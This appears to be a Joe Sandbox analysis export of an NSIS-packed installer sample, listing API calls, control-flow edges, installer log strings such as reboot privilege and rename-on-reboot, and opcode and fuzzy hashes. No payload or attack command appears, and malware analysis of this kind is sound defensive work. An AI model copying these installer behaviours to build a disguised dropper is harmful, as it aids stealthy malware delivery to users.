• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
• GetDlgItem.USER32(?,000003F8), ref: 00405179
  • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406902
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• GetDlgItem.USER32(?,000003EC), ref: 004052D7
• CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
• CloseHandle.KERNELBASE(00000000), ref: 004052EC
• ShowWindow.USER32(00000000), ref: 00405313
• ShowWindow.USER32(?,00000008), ref: 00405318
• ShowWindow.USER32(00000008), ref: 0040535F
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
• CreatePopupMenu.USER32 ref: 004053A2
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
• GetWindowRect.USER32(?,?), ref: 004053CA
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
• OpenClipboard.USER32(00000000), ref: 00405437
• EmptyClipboard.USER32 ref: 0040543D
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
• GlobalLock.KERNEL32(00000000), ref: 00405453
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
• GlobalUnlock.KERNEL32(00000000), ref: 00405489
• SetClipboardData.USER32(0000000D,00000000), ref: 00405494
• CloseClipboard.USER32 ref: 0040549A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
• String ID: New install of "%s" to "%s"${
• API String ID: 2110491804-1641061399
• Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
• Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
• Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
• Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Control-flow Graph

APIs
• #17.COMCTL32 ref: 004038CE
• SetErrorMode.KERNELBASE(00008001), ref: 004038D9
• OleInitialize.OLE32(00000000), ref: 004038E0
  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
• SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
• GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
• GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
• CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
• GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
• GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
• lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
• DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
• CoUninitialize.COMBASE(?), ref: 00403AFD
• ExitProcess.KERNEL32 ref: 00403B1D
• lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
• lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
• CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
• SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
• DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
• CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
• CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
• GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
• ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
• String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
• API String ID: 2435955865-3712954417
• Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
• Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
• Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
• Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
APIs
• FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
• FindClose.KERNEL32(00000000), ref: 00406318
Strings
Similarity
• API ID: Find$CloseFileFirst
• String ID: jF
• API String ID: 2295610775-3349280890
• Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
• Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
• Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
• Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
APIs
• GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
• LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
• GetProcAddress.KERNEL32(00000000), ref: 00406353
Similarity
• API ID: AddressHandleLibraryLoadModuleProc
• String ID:
• API String ID: 310444273-0
• Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
• Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
• Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
• Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Control-flow Graph (node ranges and edges as exported from the graph view; the executed/not-executed colouring of the original image is not recoverable in text)

control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
APIs
• PostQuitMessage.USER32(00000000), ref: 00401648
• Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
• SetForegroundWindow.USER32(?), ref: 004016CB
• ShowWindow.USER32(?), ref: 00401753
• ShowWindow.USER32(?), ref: 00401767
• SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
• CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
• GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
• GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
• GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
• SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
• MoveFileW.KERNEL32(00000000,?), ref: 00401908
• GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
• GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
• SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
Strings
• SetFileAttributes failed., xrefs: 004017A1
• CreateDirectory: "%s" created, xrefs: 00401849
• BringToFront, xrefs: 004016BD
• IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
• Rename on reboot: %s, xrefs: 00401943
• CreateDirectory: "%s" (%d), xrefs: 004017BF
• CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
• Aborting: "%s", xrefs: 0040161D
• Sleep(%d), xrefs: 0040169D
• IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
• Call: %d, xrefs: 0040165A
• Jump: %d, xrefs: 00401602
• Rename failed: %s, xrefs: 0040194B
• CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
• SetFileAttributes: "%s":%08X, xrefs: 0040177B
• Rename: %s, xrefs: 004018F8
• detailprint: %s, xrefs: 00401679
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
• String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
• API String ID: 2872004960-3619442763
• Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
• Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
• Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
• Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Control-flow Graph (node ranges and edges as exported from the graph view; the executed/not-executed colouring of the original image is not recoverable in text)

control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
• ShowWindow.USER32(?), ref: 004054FE
• DestroyWindow.USER32 ref: 00405512
• SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
• GetDlgItem.USER32(?,?), ref: 0040554F
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
• IsWindowEnabled.USER32(00000000), ref: 0040556A
• GetDlgItem.USER32(?,00000001), ref: 00405619
• GetDlgItem.USER32(?,00000002), ref: 00405623
• SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
• GetDlgItem.USER32(?,00000003), ref: 00405734
• ShowWindow.USER32(00000000,?), ref: 00405756
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
• EnableWindow.USER32(?,?), ref: 00405783
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
• EnableMenuItem.USER32(00000000), ref: 004057A0
• SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
• lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                    • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Control-flow Graph (graph image omitted; legend: Executed / Not Executed)
APIs
  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
• lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
• lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
• lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
• GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
• RegisterClassW.USER32(00476A40), ref: 00405B36
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
• CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
  • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
• ShowWindow.USER32(00000005,00000000), ref: 00405BBD
• LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
• LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
• GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
• GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
• RegisterClassW.USER32(00476A40), ref: 00405BFF
• DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
• String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
• API String ID: 608394941-2746725676
• Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
• Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
• Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
• Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Control-flow Graph (graph image omitted)
APIs
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• lstrcatW.KERNEL32(00000000,00000000,%MxBearing%,004D70B0,00000000,00000000), ref: 00401A76
• CompareFileTime.KERNEL32(-00000014,?,%MxBearing%,%MxBearing%,00000000,00000000,%MxBearing%,004D70B0,00000000,00000000), ref: 00401AA0
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,74DF23A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                    • String ID: %MxBearing%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                                                                                                                                                                                                    • API String ID: 4286501637-3689784668
                                                                                                                                                                                                                                                                                    • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                    • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
